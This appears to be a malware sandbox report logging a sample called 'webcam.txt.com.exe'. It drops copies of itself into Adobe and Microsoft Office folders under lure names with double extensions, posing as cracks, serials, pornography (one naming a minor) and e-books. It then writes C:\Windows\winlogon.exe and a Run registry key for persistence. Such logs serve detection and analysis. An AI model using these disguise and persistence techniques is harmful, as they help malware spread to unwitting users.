Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Win Longhorn Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Win Longhorn Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Win Longhorn Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Windows\winlogon.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ICQ NetJump to behavior
